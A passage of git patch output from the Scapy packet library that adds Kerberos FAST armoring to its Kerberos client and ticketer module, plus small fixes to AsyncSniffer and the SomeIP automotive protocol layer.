++++++++++++++++++++++++++++++++------ scapy/libs/rfc3961.py | 12 + scapy/modules/ticketer.py | 56 +++- 3 files changed, 521 insertions(+), 85 deletions(-) diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 9d404c785c4..2f65ba1bf5c 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -303,6 +303,9 @@ def get_usage(self): if patype == 2: # AS-REQ PA-ENC-TIMESTAMP padata timestamp return 1, PA_ENC_TS_ENC + elif patype == 138: + # RFC6113 PA-ENC-TS-ENC + return 54, PA_ENC_TS_ENC elif isinstance(self.underlayer, KRB_Ticket): # AS-REP Ticket and TGS-REP Ticket return 2, EncTicketPart @@ -332,6 +335,9 @@ def get_usage(self): elif isinstance(self.underlayer, KrbFastArmoredReq): # KEY_USAGE_FAST_ENC return 51, KrbFastReq + elif isinstance(self.underlayer, KrbFastArmoredRep): + # KEY_USAGE_FAST_REP + return 52, KrbFastResponse raise ValueError( "Could not guess key usage number. Please specify key_usage_number" ) @@ -460,6 +466,9 @@ def get_usage(self): elif isinstance(self.underlayer, KrbFastArmoredReq): # KEY_USAGE_FAST_REQ_CHKSUM return 50 + elif isinstance(self.underlayer, KrbFastFinished): + # KEY_USAGE_FAST_FINISHED + return 53 raise ValueError( "Could not guess key usage number. Please specify key_usage_number" ) @@ -720,7 +729,8 @@ class PA_ENC_TS_ENC(ASN1_Packet): ) -_PADATA_CLASSES[2] = EncryptedData +_PADATA_CLASSES[2] = EncryptedData # PA-ENC-TIMESTAMP +_PADATA_CLASSES[138] = EncryptedData # PA-ENCRYPTED-CHALLENGE # RFC 4120 sect 5.2.7.4 @@ -1056,7 +1066,7 @@ class KrbFastArmoredReq(ASN1_Packet): ASN1_root = ASN1F_SEQUENCE( ASN1F_SEQUENCE( ASN1F_optional( - ASN1F_PACKET("armor", KrbFastArmor(), KrbFastArmor, explicit_tag=0xA0) + ASN1F_PACKET("armor", None, KrbFastArmor, explicit_tag=0xA0) ), ASN1F_PACKET("reqChecksum", Checksum(), Checksum, explicit_tag=0xA1), ASN1F_PACKET("encFastReq", None, EncryptedData, explicit_tag=0xA2), @@ -1110,7 +1120,7 @@ class KrbFastResponse(ASN1_Packet): ASN1_root = ASN1F_SEQUENCE( ASN1F_SEQUENCE_OF("padata", [PADATA()], PADATA, explicit_tag=0xA0), ASN1F_optional( - ASN1F_PACKET("stengthenKey", None, EncryptionKey, explicit_tag=0xA1) + ASN1F_PACKET("strengthenKey", None, EncryptionKey, explicit_tag=0xA1) ), ASN1F_optional( ASN1F_PACKET( @@ -1787,10 +1797,11 @@ def m2i(self, pkt, s): val = super(_KRBERROR_data_Field, self).m2i(pkt, s) if not val[0].val: return val - if pkt.errorCode.val in [14, 24, 25]: + if pkt.errorCode.val in [14, 24, 25, 36]: # 14: KDC_ERR_ETYPE_NOSUPP # 24: KDC_ERR_PREAUTH_FAILED # 25: KDC_ERR_PREAUTH_REQUIRED + # 36: KRB_AP_ERR_BADMATCH return MethodData(val[0].val, _underlayer=pkt), val[1] elif pkt.errorCode.val in [6, 7, 13, 18, 29, 41, 60]: # 6: KDC_ERR_C_PRINCIPAL_UNKNOWN @@ -1918,6 +1929,10 @@ class KRB_ERROR(ASN1_Packet): ) +# PA-FX-ERROR +_PADATA_CLASSES[137] = KRB_ERROR + + # [MS-KILE] sect 2.2.1 @@ -2598,6 +2613,32 @@ def select(sockets, remain=None): class KerberosClient(Automaton): + """ + :param mode: the mode to use for the client (default: AS_REQ). + :param ip: the IP of the DC (default: discovered by dclocator) + :param upn: the UPN of the client. + :param password: the password of the client. + :param key: the Key of the client (instead of the password) + :param realm: the realm of the domain. (default: from the UPN) + :param spn: the SPN to request in a TGS-REQ + :param ticket: the existing ticket to use in a TGS-REQ + :param host: the name of the host doing the request + :param renew: sets the Renew flag in a TGS-REQ + :param additional_tickets: in U2U or S4U2Proxy, the additional tickets + :param u2u: sets the U2U flag + :param for_user: the UPN of another user in TGS-REQ, to do a S4U2Self + :param s4u2proxy: sets the S4U2Proxy flag + :param kdc_proxy: specify a KDC proxy url + :param kdc_proxy_no_check_certificate: do not check the KDC proxy certificate + :param fast: use FAST armoring + :param armor_ticket: an external ticket to use for armoring + :param armor_ticket_upn: the UPN of the client of the armoring ticket + :param armor_ticket_skey: the session Key object of the armoring ticket + :param etypes: specify the list of encryption types to support + :param port: the Kerberos port (default 88) + :param timeout: timeout of each request (default 5) + """ + RES_AS_MODE = namedtuple("AS_Result", ["asrep", "sessionkey", "kdcrep"]) RES_TGS_MODE = namedtuple("TGS_Result", ["tgsrep", "sessionkey", "kdcrep"]) @@ -2610,12 +2651,13 @@ def __init__( self, mode=MODE.AS_REQ, ip=None, - host=None, upn=None, password=None, + key=None, realm=None, spn=None, ticket=None, + host=None, renew=False, additional_tickets=[], u2u=False, @@ -2623,8 +2665,11 @@ def __init__( s4u2proxy=False, kdc_proxy=None, kdc_proxy_no_check_certificate=False, + fast=False, + armor_ticket=None, + armor_ticket_upn=None, + armor_ticket_skey=None, etypes=None, - key=None, port=88, timeout=5, **kwargs, @@ -2667,6 +2712,20 @@ def __init__( debug=kwargs.get("debug", 0), ).ip + if fast: + if mode == self.MODE.AS_REQ: + # Requires an external ticket + if not armor_ticket or not armor_ticket_upn or not armor_ticket_skey: + raise ValueError( + "Implicit armoring is not possible on AS-REQ: " + "please provide the 3 required armor arguments" + ) + elif mode == self.MODE.TGS_REQ: + if armor_ticket and (not armor_ticket_upn or not armor_ticket_skey): + raise ValueError( + "Cannot specify armor_ticket without armor_ticket_{upn,skey}" + ) + if mode == self.MODE.GET_SALT: if etypes is not None: raise ValueError("Cannot specify etypes in GET_SALT mode !") @@ -2684,6 +2743,7 @@ def __init__( EncryptionType.AES256_CTS_HMAC_SHA1_96, EncryptionType.AES128_CTS_HMAC_SHA1_96, EncryptionType.RC4_HMAC, + EncryptionType.RC4_HMAC_EXP, EncryptionType.DES_CBC_MD5, ] self.etypes = etypes @@ -2705,17 +2765,29 @@ def __init__( self.upn = upn self.realm = realm.upper() self.ticket = ticket + self.fast = fast + self.armor_ticket = armor_ticket + self.armor_ticket_upn = armor_ticket_upn + self.armor_ticket_skey = armor_ticket_skey self.renew = renew self.additional_tickets = additional_tickets # U2U + S4U2Proxy self.u2u = u2u # U2U self.for_user = for_user # FOR-USER self.s4u2proxy = s4u2proxy # S4U2Proxy self.key = key + self.subkey = None # In the AP-REQ authenticator + self.replykey = None # Key used for reply # See RFC4120 - sect 7.2.2 # This marks whether we should follow-up after an EOF self.should_followup = False - # Negotiated parameters + # This marks that we sent a FAST-req and are awaiting for an answer + self.fast_req_sent = False + # Session parameters self.pre_auth = False + self.fast_rep = None + self.fast_error = None + self.fast_skey = None # The random subkey used for fast + self.fast_armorkey = None # The armor key self.fxcookie = None sock = self._connect() @@ -2726,6 +2798,8 @@ def __init__( def _connect(self): if self.kdc_proxy: + # If we are using a KDC Proxy, wrap the socket with the KdcProxySocket, + # that takes our messages and transport them over HTTP. sock = KdcProxySocket( url=self.kdc_proxy, targetDomain=self.realm, @@ -2746,7 +2820,7 @@ def _base_kdc_req(self, now_time): etype=[ASN1_INTEGER(x) for x in self.etypes], additionalTickets=None, # Windows default - kdcOptions="forwardable+renewable+canonicalize", + kdcOptions="forwardable+renewable+canonicalize+renewable-ok", cname=None, realm=ASN1_GENERAL_STRING(self.realm), till=ASN1_GENERALIZED_TIME(now_time + timedelta(hours=10)), @@ -2757,9 +2831,136 @@ def _base_kdc_req(self, now_time): kdcreq.kdcOptions.set(30, 1) # set 'renew' (bit 30) return kdcreq + def calc_fast_armorkey(self): + """ + Calculate and return the FAST armorkey + """ + # Generate a random key of the same type than ticket_skey + from scapy.libs.rfc3961 import Key, KRB_FX_CF2 + + if self.mode == self.MODE.AS_REQ: + # AS-REQ mode + self.fast_skey = Key.new_random_key(self.armor_ticket_skey.etype) + + self.fast_armorkey = KRB_FX_CF2( + self.fast_skey, + self.armor_ticket_skey, + b"subkeyarmor", + b"ticketarmor", + ) + elif self.mode == self.MODE.TGS_REQ: + # TGS-REQ: 2 cases + + self.subkey = Key.new_random_key(self.key.etype) + + if not self.armor_ticket: + # Case 1: Implicit armoring + self.fast_armorkey = KRB_FX_CF2( + self.subkey, + self.key, + b"subkeyarmor", + b"ticketarmor", + ) + else: + # Case 2: Explicit armoring, in "Compounded Identity mode". + # This is a Microsoft extension: see [MS-KILE] sect 3.3.5.7.4 + + self.fast_skey = Key.new_random_key(self.armor_ticket_skey.etype) + + explicit_armor_key = KRB_FX_CF2( + self.fast_skey, + self.armor_ticket_skey, + b"subkeyarmor", + b"ticketarmor", + ) + + self.fast_armorkey = KRB_FX_CF2( + explicit_armor_key, + self.subkey, + b"explicitarmor", + b"tgsarmor", + ) + + def _fast_wrap(self, kdc_req, padata, now_time, pa_tgsreq_ap=None): + """ + :param kdc_req: the KDC_REQ_BODY to wrap + :param padata: the list of PADATA to wrap + :param now_time: the current timestamp used by the client + """ + + # Create the PA Fast request wrapper + pafastreq = PA_FX_FAST_REQUEST( + armoredData=KrbFastArmoredReq( + reqChecksum=Checksum(), + encFastReq=EncryptedData(), + ) + ) + + if self.armor_ticket is not None: + # EXPLICIT mode only (AS-REQ or TGS-REQ) + + pafastreq.armoredData.armor = KrbFastArmor( + armorType=1, # FX_FAST_ARMOR_AP_REQUEST + armorValue=KRB_AP_REQ( + ticket=self.armor_ticket, + authenticator=EncryptedData(), + ), + ) + + # Populate the authenticator. Note the client is the wrapper + _, crealm = _parse_upn(self.armor_ticket_upn) + authenticator = KRB_Authenticator( + crealm=ASN1_GENERAL_STRING(crealm), + cname=PrincipalName.fromUPN(self.armor_ticket_upn), + cksum=None, + ctime=ASN1_GENERALIZED_TIME(now_time), + cusec=ASN1_INTEGER(0), + subkey=EncryptionKey.fromKey(self.fast_skey), + seqNumber=ASN1_INTEGER(0), + encAuthorizationData=None, + ) + pafastreq.armoredData.armor.armorValue.authenticator.encrypt( + self.armor_ticket_skey, + authenticator, + ) + + # Sign the fast request wrapper + if self.mode == self.MODE.TGS_REQ: + # "for a TGS-REQ, it is performed over the type AP- + # REQ in the PA-TGS-REQ padata of the TGS request" + pafastreq.armoredData.reqChecksum.make( + self.fast_armorkey, + bytes(pa_tgsreq_ap), + ) + else: + # "For an AS-REQ, it is performed over the type KDC-REQ- + # BODY for the req-body field of the KDC-REQ structure of the + # containing message" + pafastreq.armoredData.reqChecksum.make( + self.fast_armorkey, + bytes(kdc_req), + ) + + # Build and encrypt the Fast request + fastreq = KrbFastReq( + padata=padata, + reqBody=kdc_req, + ) + pafastreq.armoredData.encFastReq.encrypt( + self.fast_armorkey, + fastreq, + ) + + # Return the PADATA + return PADATA( + padataType=ASN1_INTEGER(136), # PA-FX-FAST + padataValue=pafastreq, + ) + def as_req(self): now_time = datetime.now(timezone.utc).replace(microsecond=0) + # 1. Build and populate KDC-REQ kdc_req = self._base_kdc_req(now_time=now_time) kdc_req.addresses = [ HostAddress( @@ -2770,79 +2971,120 @@ def as_req(self): kdc_req.cname = PrincipalName.fromUPN(self.upn) kdc_req.sname = PrincipalName.fromSPN(self.spn) - asreq = Kerberos( - root=KRB_AS_REQ( - padata=[ - PADATA( - padataType=ASN1_INTEGER(128), # PA-PAC-REQUEST - padataValue=PA_PAC_REQUEST(includePac=ASN1_BOOLEAN(-1)), - ) - ], - reqBody=kdc_req, - ) - ) - # Pre-auth support - if self.pre_auth: - asreq.root.padata.insert( - 0, - PADATA( - padataType=0x2, # PA-ENC-TIMESTAMP - padataValue=EncryptedData(), - ), - ) - asreq.root.padata[0].padataValue.encrypt( - self.key, PA_ENC_TS_ENC(patimestamp=ASN1_GENERALIZED_TIME(now_time)) + # 2. Build the list of PADATA + padata = [ + PADATA( + padataType=ASN1_INTEGER(128), # PA-PAC-REQUEST + padataValue=PA_PAC_REQUEST(includePac=ASN1_BOOLEAN(-1)), ) + ] + # Cookie support if self.fxcookie: - asreq.root.padata.insert( + padata.insert( 0, PADATA( padataType=133, # PA-FX-COOKIE padataValue=self.fxcookie, ), ) + + # FAST + if self.fast: + # Calculate the armor key + self.calc_fast_armorkey() + + # [MS-KILE] sect 3.2.5.5 + # "When sending the AS-REQ, add a PA-PAC-OPTIONS [167]" + padata.append( + PADATA( + padataType=ASN1_INTEGER(167), # PA-PAC-OPTIONS + padataValue=PA_PAC_OPTIONS( + options="Claims", + ), + ) + ) + + # Pre-auth is requested + if self.pre_auth: + if self.fast: + # Special FAST factor + # RFC6113 sect 5.4.6 + from scapy.libs.rfc3961 import KRB_FX_CF2 + + # Calculate the 'challenge key' + ts_key = KRB_FX_CF2( + self.fast_armorkey, + self.key, + b"clientchallengearmor", + b"challengelongterm", + ) + pafactor = PADATA( + padataType=138, # PA-ENCRYPTED-CHALLENGE + padataValue=EncryptedData(), + ) + else: + # Usual 'timestamp' factor + ts_key = self.key + pafactor = PADATA( + padataType=2, # PA-ENC-TIMESTAMP + padataValue=EncryptedData(), + ) + pafactor.padataValue.encrypt( + ts_key, + PA_ENC_TS_ENC(patimestamp=ASN1_GENERALIZED_TIME(now_time)), + ) + padata.insert( + 0, + pafactor, + ) + + # FAST support + if self.fast: + # We are using RFC6113's FAST armoring. The PADATA's are therefore + # hidden inside the encrypted section. + padata = [ + self._fast_wrap( + kdc_req=kdc_req, + padata=padata, + now_time=now_time, + ) + ] + + # 3. Build the request + asreq = Kerberos( + root=KRB_AS_REQ( + padata=padata, + reqBody=kdc_req, + ) + ) + + # Note the reply key + self.replykey = self.key + return asreq def tgs_req(self): now_time = datetime.now(timezone.utc).replace(microsecond=0) - kdc_req = self._base_kdc_req(now_time=now_time) - - _, crealm = _parse_upn(self.upn) - authenticator = KRB_Authenticator( - crealm=ASN1_GENERAL_STRING(crealm), - cname=PrincipalName.fromUPN(self.upn), - cksum=None, - ctime=ASN1_GENERALIZED_TIME(now_time), - cusec=ASN1_INTEGER(0), - subkey=None, - seqNumber=None, - encAuthorizationData=None, - ) + # Compute armor key for FAST + if self.fast: + self.calc_fast_armorkey() - apreq = KRB_AP_REQ(ticket=self.ticket, authenticator=EncryptedData()) + # 1. Build and populate KDC-REQ + kdc_req = self._base_kdc_req(now_time=now_time) + kdc_req.sname = PrincipalName.fromSPN(self.spn) # Additional tickets if self.additional_tickets: kdc_req.additionalTickets = self.additional_tickets - if self.u2u: # U2U + # U2U + if self.u2u: kdc_req.kdcOptions.set(28, 1) # set 'enc-tkt-in-skey' (bit 28) - kdc_req.sname = PrincipalName.fromSPN(self.spn) - - tgsreq = Kerberos( - root=KRB_TGS_REQ( - padata=[ - PADATA( - padataType=ASN1_INTEGER(1), # PA-TGS-REQ - padataValue=apreq, - ) - ], - reqBody=kdc_req, - ) - ) + # 2. Build the list of PADATA + padata = [] # [MS-SFU] FOR-USER extension if self.for_user is not None: @@ -2867,7 +3109,7 @@ def tgs_req(self): S4UByteArray, cksumtype=ChecksumType.HMAC_MD5, ) - tgsreq.root.padata.append( + padata.append( PADATA( padataType=ASN1_INTEGER(129), # PA-FOR-USER padataValue=paforuser, @@ -2877,7 +3119,7 @@ def tgs_req(self): # [MS-SFU] S4U2proxy - sect 3.1.5.2.1 if self.s4u2proxy: # "PA-PAC-OPTIONS with resource-based constrained-delegation bit set" - tgsreq.root.padata.append( + padata.append( PADATA( padataType=ASN1_INTEGER(167), # PA-PAC-OPTIONS padataValue=PA_PAC_OPTIONS( @@ -2888,6 +3130,26 @@ def tgs_req(self): # "kdc-options field: MUST include the new cname-in-addl-tkt options flag" kdc_req.kdcOptions.set(14, 1) + # 3. Build the AP-req inside a PA + apreq = KRB_AP_REQ(ticket=self.ticket, authenticator=EncryptedData()) + pa_tgs_req = PADATA( + padataType=ASN1_INTEGER(1), # PA-TGS-REQ + padataValue=apreq, + ) + + # 4. Populate it's authenticator + _, crealm = _parse_upn(self.upn) + authenticator = KRB_Authenticator( + crealm=ASN1_GENERAL_STRING(crealm), + cname=PrincipalName.fromUPN(self.upn), + cksum=None, + ctime=ASN1_GENERALIZED_TIME(now_time), + cusec=ASN1_INTEGER(0), + subkey=EncryptionKey.fromKey(self.subkey) if self.subkey else None, + seqNumber=None, + encAuthorizationData=None, + ) + # Compute checksum if self.key.cksumtype: authenticator.cksum = Checksum() @@ -2895,8 +3157,38 @@ def tgs_req(self): self.key, bytes(kdc_req), ) + # Encrypt authenticator apreq.authenticator.encrypt(self.key, authenticator) + + # 5. Process FAST if required + if self.fast: + padata = [ + self._fast_wrap( + kdc_req=kdc_req, + padata=padata, + now_time=now_time, + pa_tgsreq_ap=apreq, + ) + ] + + # 6. Add the final PADATA + padata.append(pa_tgs_req) + + # 7. Build the request + tgsreq = Kerberos( + root=KRB_TGS_REQ( + padata=padata, + reqBody=kdc_req, + ) + ) + + # Note the reply key + if self.subkey: + self.replykey = self.subkey + else: + self.replykey = self.key + return tgsreq @ATMT.state(initial=1) @@ -2906,7 +3198,7 @@ def BEGIN(self): @ATMT.condition(BEGIN) def should_send_as_req(self): if self.mode in [self.MODE.AS_REQ, self.MODE.GET_SALT]: - raise self.SENT_AP_REQ() + raise self.SENT_AS_REQ() @ATMT.condition(BEGIN) def should_send_tgs_req(self): @@ -2922,7 +3214,7 @@ def send_tgs_req(self): self.send(self.tgs_req()) @ATMT.state() - def SENT_AP_REQ(self): + def SENT_AS_REQ(self): pass @ATMT.state() @@ -2930,11 +3222,11 @@ def SENT_TGS_REQ(self): pass def _process_padatas_and_key(self, padatas): - from scapy.libs.rfc3961 import EncryptionType, Key + from scapy.libs.rfc3961 import EncryptionType, Key, KRB_FX_CF2 etype = None salt = b"" - # Process pa-data + # 1. Process pa-data if padatas is not None: for padata in padatas: if padata.padataType == 0x13 and etype is None: # PA-ETYPE-INFO2 @@ -2945,17 +3237,37 @@ def _process_padatas_and_key(self, padatas): salt = elt.salt.val elif padata.padataType == 133: # PA-FX-COOKIE self.fxcookie = padata.padataValue + elif padata.padataType == 136: # PA-FX-FAST + if isinstance(padata.padataValue, PA_FX_FAST_REPLY): + self.fast_rep = ( + padata.padataValue.armoredData.encFastRep.decrypt( + self.fast_armorkey, + ) + ) + elif padata.padataType == 137: # PA-FX-ERROR + self.fast_error = padata.padataValue + + # 2. Update the current key if necessary - etype = etype or self.etypes[0] # Compute key if not already provided - if self.key is None: + if self.key is None and etype is not None: self.key = Key.string_to_key( etype, self.password, salt, ) - @ATMT.receive_condition(SENT_AP_REQ, prio=0) + # Update the key with the fast reply, if necessary + if self.fast_rep and self.fast_rep.strengthenKey: + # "The strengthen-key field MAY be set in an AS reply" + self.replykey = KRB_FX_CF2( + self.fast_rep.strengthenKey.toKey(), + self.replykey, + b"strengthenkey", + b"replykey", + ) + + @ATMT.receive_condition(SENT_AS_REQ, prio=0) def receive_salt_mode(self, pkt): # This is only for "Salt-Mode", a mode where we get the salt then # exit. @@ -2976,11 +3288,29 @@ def receive_salt_mode(self, pkt): log_runtime.error("Failed to retrieve the salt !") raise self.FINAL() - @ATMT.receive_condition(SENT_AP_REQ, prio=1) + @ATMT.receive_condition(SENT_AS_REQ, prio=1) def receive_krb_error_as_req(self, pkt): - # We check for a PREAUTH_REQUIRED error. This means that preauth is required - # and we need to do a second exchange. + # We check for Kerberos errors. + # There is a special case for PREAUTH_REQUIRED error, which means that preauth + # is required and we need to do a second exchange. if Kerberos in pkt and isinstance(pkt.root, KRB_ERROR): + # Process PAs if available + if pkt.root.eData and isinstance(pkt.root.eData, MethodData): + self._process_padatas_and_key(pkt.root.eData.seq) + + # Special case for FAST errors + if self.fast_rep: + # This is actually a fast response error ! + frep, self.fast_rep = self.fast_rep, None + # Re-process PAs + self._process_padatas_and_key(frep.padata) + # Extract real Kerberos error from FAST message + ferr = Kerberos(root=self.fast_error) + self.fast_error = None + # Recurse + self.receive_krb_error_as_req(ferr) + return + if pkt.root.errorCode == 25: # KDC_ERR_PREAUTH_REQUIRED if not self.key and (not self.upn or not self.password): log_runtime.error( @@ -2988,7 +3318,6 @@ def receive_krb_error_as_req(self, pkt): "but no key, nor upn+pass was passed." ) raise self.FINAL() - self._process_padatas_and_key(pkt.root.eData.seq) self.should_followup = True self.pre_auth = True raise self.BEGIN() @@ -2997,12 +3326,12 @@ def receive_krb_error_as_req(self, pkt): pkt.show() raise self.FINAL() - @ATMT.receive_condition(SENT_AP_REQ, prio=2) + @ATMT.receive_condition(SENT_AS_REQ, prio=2) def receive_as_rep(self, pkt): if Kerberos in pkt and isinstance(pkt.root, KRB_AS_REP): raise self.FINAL().action_parameters(pkt) - @ATMT.eof(SENT_AP_REQ) + @ATMT.eof(SENT_AS_REQ) def retry_after_eof_in_apreq(self): if self.should_followup: # Reconnect and Restart @@ -3018,14 +3347,42 @@ def decrypt_as_rep(self, pkt): self._process_padatas_and_key(pkt.root.padata) if not self.pre_auth: log_runtime.warning("Pre-authentication was disabled for this account !") - # Decrypt + + # Process FAST response + if self.fast_rep: + # Verify the ticket-checksum + self.fast_rep.finished.ticketChecksum.verify( + self.fast_armorkey, + bytes(pkt.root.ticket), + ) + self.fast_rep = None + elif self.fast: + raise ValueError("Answer was not FAST ! Is it supported?") + + # Decrypt AS-REP response enc = pkt.root.encPart - res = enc.decrypt(self.key) + res = enc.decrypt(self.replykey) self.result = self.RES_AS_MODE(pkt.root, res.key.toKey(), res) @ATMT.receive_condition(SENT_TGS_REQ) def receive_krb_error_tgs_req(self, pkt): if Kerberos in pkt and isinstance(pkt.root, KRB_ERROR): + # Process PAs if available + if pkt.root.eData and isinstance(pkt.root.eData, MethodData): + self._process_padatas_and_key(pkt.root.eData.seq) + + if self.fast_rep: + # This is actually a fast response error ! + frep, self.fast_rep = self.fast_rep, None + # Re-process PAs + self._process_padatas_and_key(frep.padata) + # Extract real Kerberos error from FAST message + ferr = Kerberos(root=self.fast_error) + self.fast_error = None + # Recurse + self.receive_krb_error_tgs_req(ferr) + return + log_runtime.warning("Received KRB_ERROR") pkt.show() raise self.FINAL() @@ -3039,9 +3396,28 @@ def receive_tgs_rep(self, pkt): @ATMT.action(receive_tgs_rep) def decrypt_tgs_rep(self, pkt): - # Decrypt + self._process_padatas_and_key(pkt.root.padata) + + # Process FAST response + if self.fast_rep: + # Verify the ticket-checksum + self.fast_rep.finished.ticketChecksum.verify( + self.fast_armorkey, + bytes(pkt.root.ticket), + ) + self.fast_rep = None + elif self.fast: + raise ValueError("Answer was not FAST ! Is it supported?") + + # Decrypt TGS-REP response enc = pkt.root.encPart - res = enc.decrypt(self.key) + if self.subkey: + # "In a TGS-REP message, the key + # usage value is 8 if the TGS session key is used, or 9 if a TGS + # authenticator subkey is used." + res = enc.decrypt(self.replykey, key_usage_number=9, cls=EncTGSRepPart) + else: + res = enc.decrypt(self.replykey) self.result = self.RES_TGS_MODE(pkt.root, res.key.toKey(), res) @ATMT.state(final=1) @@ -4005,9 +4381,8 @@ def GSS_Init_sec_context( ) # Build the authenticator now_time = datetime.now(timezone.utc).replace(microsecond=0) - Context.KrbSessionKey = Key.random_to_key( + Context.KrbSessionKey = Key.new_random_key( self.SKEY_TYPE, - os.urandom(16), ) Context.SendSeqNum = RandNum(0, 0x7FFFFFFF)._fix() _, crealm = _parse_upn(self.UPN) @@ -4228,9 +4603,8 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): # Compute an application session key ([MS-KILE] sect 3.1.1.2) subkey = None if ap_req.apOptions.val[2] == "1": # mutual-required - appkey = Key.random_to_key( + appkey = Key.new_random_key( self.SKEY_TYPE, - os.urandom(16), ) Context.KrbSessionKey = appkey Context.SessionKey = appkey.key diff --git a/scapy/libs/rfc3961.py b/scapy/libs/rfc3961.py index a634b01ac3a..7f7d53517ef 100644 --- a/scapy/libs/rfc3961.py +++ b/scapy/libs/rfc3961.py @@ -1382,6 +1382,18 @@ def random_to_key(cls, etype, seed): raise ValueError("Wrong crypto seed length") return ep.random_to_key(seed) + @classmethod + def new_random_key(cls, etype): + # type: (EncryptionType) -> Key + """ + Generates a seed then calls random-to-key + """ + try: + ep = _enctypes[etype] + except ValueError: + raise ValueError("Unknown etype '%s'" % etype) + return cls.random_to_key(etype, os.urandom(ep.seedsize)) + @classmethod def string_to_key(cls, etype, string, salt, params=None): # type: (EncryptionType, bytes, bytes, Optional[bytes]) -> Key diff --git a/scapy/modules/ticketer.py b/scapy/modules/ticketer.py index 3a1895a9161..735fbd17d9e 100644 --- a/scapy/modules/ticketer.py +++ b/scapy/modules/ticketer.py @@ -2100,20 +2100,58 @@ def resign_ticket(self, i, hash=None, kdc_hash=None): tkt = self.dec_ticket(i, hash=hash) self.update_ticket(i, tkt, resign=True, hash=hash, kdc_hash=kdc_hash) - def request_tgt(self, upn, ip=None, key=None, password=None, realm=None, **kwargs): + def request_tgt( + self, + upn, + ip=None, + key=None, + password=None, + realm=None, + fast=False, + armor_with=None, + **kwargs, + ): """ Request a Kerberos TGT and add it to the local CCache See :func:`~scapy.layers.kerberos.krb_as_req` for the full documentation. """ - res = krb_as_req(upn, ip=ip, key=key, password=password, realm=realm, **kwargs) + # If `armor_with` is specified, get the armor ticket from our store + armor_ticket, armor_ticket_skey, armor_ticket_upn = None, None, None + if armor_with is not None: + fast = True + armor_ticket, armor_ticket_skey, armor_ticket_upn, _ = self.export_krb( + armor_with + ) + + res = krb_as_req( + upn=upn, + ip=ip, + key=key, + password=password, + realm=realm, + fast=fast, + armor_ticket=armor_ticket, + armor_ticket_upn=armor_ticket_upn, + armor_ticket_skey=armor_ticket_skey, + **kwargs, + ) if not res: return self.import_krb(res) def request_st( - self, i, spn, ip=None, renew=False, realm=None, additional_tickets=[], **kwargs + self, + i, + spn, + ip=None, + renew=False, + realm=None, + additional_tickets=[], + fast=False, + armor_with=None, + **kwargs, ): """ Request a Kerberos TS and add it to the local CCache using another ticket @@ -2124,6 +2162,14 @@ def request_st( """ ticket, sessionkey, upn, _ = self.export_krb(i) + # If `armor_with` is specified, get the armor ticket from our store + armor_ticket, armor_ticket_skey, armor_ticket_upn = None, None, None + if armor_with is not None: + fast = True + armor_ticket, armor_ticket_skey, armor_ticket_upn, _ = self.export_krb( + armor_with + ) + res = krb_tgs_req( upn, spn, @@ -2133,6 +2179,10 @@ def request_st( renew=renew, realm=realm, additional_tickets=additional_tickets, + fast=fast, + armor_ticket=armor_ticket, + armor_ticket_upn=armor_ticket_upn, + armor_ticket_skey=armor_ticket_skey, **kwargs, ) if not res: From 6689da4cef0148de33b93239ba9483f975d063df Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 13 Feb 2025 22:05:31 +0100 Subject: [PATCH 1432/1632] Add missing type in AsyncSniffer (#4665) --- scapy/sendrecv.py | 1 + 1 file changed, 1 insertion(+) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 4f06c19d443..07fa4fc0062 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -1147,6 +1147,7 @@ def __init__(self, *args, **kwargs): self.thread = None # type: Optional[Thread] self.results = None # type: Optional[PacketList] self.exception = None # type: Optional[Exception] + self.stop_cb = lambda: None # type: Callable[[], None] def _setup_thread(self): # type: () -> None From 1b690bfe5710d83069e480f8f81a1a05e3168c9d Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 14 Feb 2025 22:23:06 +0100 Subject: [PATCH 1433/1632] SomeIP: multi-payload, fixes #4608 (#4632) * Fixing #4608 * fix flake * apply feedback * fix typing * fix stupid IDE import --- scapy/contrib/automotive/someip.py | 15 ++++++----- test/contrib/automotive/someip.uts | 40 ++++++++++++++++++++++++++++++ 2 files changed, 47 insertions(+), 8 deletions(-) diff --git a/scapy/contrib/automotive/someip.py b/scapy/contrib/automotive/someip.py index 09e9c891dc5..a10cd24dc72 100644 --- a/scapy/contrib/automotive/someip.py +++ b/scapy/contrib/automotive/someip.py @@ -13,13 +13,13 @@ from scapy.layers.inet6 import IP6Field from scapy.compat import raw, orb from scapy.config import conf -from scapy.packet import Packet, Raw, bind_top_down, bind_bottom_up +from scapy.packet import Packet, Raw, bind_top_down, bind_bottom_up, bind_layers from scapy.fields import (XShortField, ConditionalField, BitField, XBitField, XByteField, ByteEnumField, ShortField, X3BytesField, StrLenField, IPField, FieldLenField, PacketListField, XIntField, - MultipleTypeField, FlagsField, IntField, - XByteEnumField, BitScalingField) + MultipleTypeField, FlagsField, + XByteEnumField, BitScalingField, LenField) class SOMEIP(Packet): @@ -73,7 +73,7 @@ class SOMEIP(Packet): ], XShortField("sub_id", 0), ), - IntField("len", None), + LenField("len", None, fmt=">I", adjust=lambda x: x + 8), XShortField("client_id", 0), XShortField("session_id", 0), XByteField("proto_ver", PROTOCOL_VERSION), @@ -117,12 +117,10 @@ class SOMEIP(Packet): ConditionalField( BitField("more_seg", 0, 1), lambda pkt: SOMEIP._is_tp(pkt)), # noqa: E501 - ConditionalField(PacketListField( + PacketListField( "data", [Raw()], Raw, length_from=lambda pkt: pkt.len - (SOMEIP.LEN_OFFSET_TP if (SOMEIP._is_tp(pkt) and (pkt.len is None or pkt.len >= SOMEIP.LEN_OFFSET_TP)) else SOMEIP.LEN_OFFSET), # noqa: E501 - next_cls_cb=lambda pkt, lst, cur, remain: - SOMEIP.get_payload_cls_by_srv_id(pkt, lst, cur, remain)), - lambda pkt: SOMEIP._is_tp(pkt)) # noqa: E501 + next_cls_cb=lambda pkt, lst, cur, remain: SOMEIP.get_payload_cls_by_srv_id(pkt, lst, cur, remain)) # noqa: E501 ] payload_cls_by_srv_id = dict() # To be customized @@ -209,6 +207,7 @@ def _bind_someip_layers(): _bind_someip_layers() +bind_layers(SOMEIP, SOMEIP) class _SDPacketBase(Packet): diff --git a/test/contrib/automotive/someip.uts b/test/contrib/automotive/someip.uts index 